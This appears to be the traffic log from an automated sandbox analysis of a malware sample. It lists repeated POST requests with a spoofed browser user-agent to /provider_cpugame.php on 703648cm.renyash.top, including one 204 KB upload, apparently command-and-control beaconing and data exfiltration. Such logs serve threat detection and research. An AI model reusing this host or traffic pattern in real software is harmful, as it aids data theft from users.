Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 20, 2024 21:17:27.859644890 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:27.932555914 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1344
Connection: keep-alive
Dec 20, 2024 21:17:28.087202072 CET | 287 | OUT | POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 384
Expect: 100-continue
Dec 20, 2024 21:17:28.494035959 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:28.923033953 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Dec 20, 2024 21:17:28.953802109 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 1512
Expect: 100-continue
Dec 20, 2024 21:17:29.361124992 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:30.081082106 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Dec 20, 2024 21:17:30.088712931 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2004
Expect: 100-continue
Dec 20, 2024 21:17:30.496216059 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:30.923456907 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Dec 20, 2024 21:17:30.925278902 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2220
Expect: 100-continue
Dec 20, 2024 21:17:31.333606958 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:32.047070980 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Dec 20, 2024 21:17:32.049681902 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2220
Expect: 100-continue
Dec 20, 2024 21:17:32.456074953 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:33.167135000 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Dec 20, 2024 21:17:33.168375969 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2220
Expect: 100-continue
Dec 20, 2024 21:17:33.575042009 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:17:34.292088985 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:34.293745995 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:34.700458050 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:35.417982101 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:33 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:35.418946028 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:35.829335928 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:36.549071074 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:34 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:36.598542929 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:37.005177021 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:37.506726027 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:35 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:37.514307022 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:37.920780897 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:38.644603968 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:38.645658016 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:39.052202940 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:39.486443043 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:37 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:39.498042107 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:39.904859066 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:40.633101940 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:40.669040918 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:41.076971054 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:41.797334909 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:39 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:41.801605940 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:42.211211920 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:42.936233044 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:41 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:42.942213058 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:43.349756956 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:44.070842981 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:42 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:44.071722984 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:44.478060007 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:45.194128990 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:43 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:45.195405006 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:45.611955881 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:46.320272923 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:44 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:46.321068048 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:46.728540897 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:47.447422028 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:47.448950052 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:47.855350018 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:48.599931955 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:46 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:48.614167929 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:49.020700932 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:49.740283012 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:47 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:49.740638018 CET 290 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 204424
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:50.148314953 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:51.449246883 CET 158 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:49 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[
                                                                                                                      Dec 20, 2024 21:17:51.449758053 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:51.856368065 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:52.586940050 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:52.587888956 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:52.995208025 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:53.714708090 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:51 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:53.715536118 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:54.122093916 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:54.842910051 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:53 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:54.847480059 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:55.254381895 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:55.983545065 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:54 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:55.984600067 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:56.391587973 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:57.116878986 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:57.117763042 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:57.525409937 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:57.950368881 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:56 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:57.951922894 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:58.358438015 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:59.079356909 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:59.082902908 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:59.489970922 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:00.213094950 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:58 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:00.214010954 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:00.620850086 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:01.343547106 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:59 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:01.344772100 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:01.751668930 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:02.471388102 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:00 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:02.472234011 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:02.878721952 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:03.592873096 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:03.593856096 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:04.000437021 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:04.718189001 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:04.718976021 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:05.126379013 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:05.846785069 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:05.847580910 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
